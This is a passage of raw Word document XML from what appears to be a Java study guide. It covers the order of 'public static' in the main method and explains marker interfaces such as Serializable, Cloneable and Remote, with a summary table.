    <w:p w14:paraId="4EB32617" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">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Complete Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B33E73" w14:textId="77777777" w:rsidR="00956FFE" w:rsidRPr="00CE4B95" w:rsidRDefault="00956F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73421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elloWorl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26FB8B0" w14:textId="77777777" w:rsidR="00956FFE" w:rsidRPr="00CE4B95" w:rsidRDefault="00956F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7342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30D1BE4" w14:textId="77777777" w:rsidR="00956FFE" w:rsidRPr="00CE4B95" w:rsidRDefault="00956F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7342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ello, Java!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3DF81" w14:textId="77777777" w:rsidR="00956FFE" w:rsidRPr="00CE4B95" w:rsidRDefault="00956F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7342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39837BC" w14:textId="2351416F" w:rsidR="00956FFE" w:rsidRPr="00CE4B95" w:rsidRDefault="00956F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734216"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F26B3F8" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002D4D31">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1981A30B">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD30B16" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">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Fun fact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D043D" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You can actually write it like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720DF621" w14:textId="0C85787F" w:rsidR="00956FFE" w:rsidRPr="00CE4B95" w:rsidRDefault="00956F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5295659"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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D031E27" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>...because the order of static and public doesn't matter in this context (but the conventional order is public static).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB6AD6" w14:textId="33D9A2B3" w:rsidR="00C74ED6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002D4D31">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="16FE463F">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F7CD36" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2577E9C6" w14:textId="69968D83" w:rsidR="00FE3834" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE3834">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc196307489"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is the marker interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="579CF272" w14:textId="6FCCEDBC" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>marker interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an interface that has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no methods or fields</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Its sole purpose is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mark</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a class with some metadata so that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM or framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can identify and treat the object differently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0DD92E" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CA9304" w14:textId="77777777" w:rsidR="00BD14DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD14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8589057"/>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erfac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rializab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176B8E0" w14:textId="77777777" w:rsidR="00BD14DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD14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85890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No methods inside — it's a marker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E75CA1" w14:textId="444886AD" w:rsidR="00BD14DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD14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8589057"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60624F70" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If a class implements Serializable, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>indicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that objects of that class can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>serialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (converted into a byte stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368E61D1" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003D1045">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3CE85849">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4B5882" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">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Common Marker Interfaces in Jav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2"/>
        <w:gridCol w:w="4245"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="4A5B6B6D" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="588F34F0" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="00BD14DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08EEC07F" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="00BD14DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="388CA1DF" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="303523A5" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Serializable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01A52BC4" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Marks objects that can be serialized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="3FF8556E" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="062AAD2D" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cloneable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E424907" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Allows object cloning using Object.clone()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="7D5A191A" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34F2262B" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48AF04DB" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Used in RMI to indicate remote method calling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="4584F74D" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0481E898" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ThreadSafe (custom)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06C4C34C" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Can be used to tag thread-safe components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="191023C2" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003D1045">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="388FC069">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B389AB4" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">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How Does It Work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65939AF8" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Although a marker interface has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
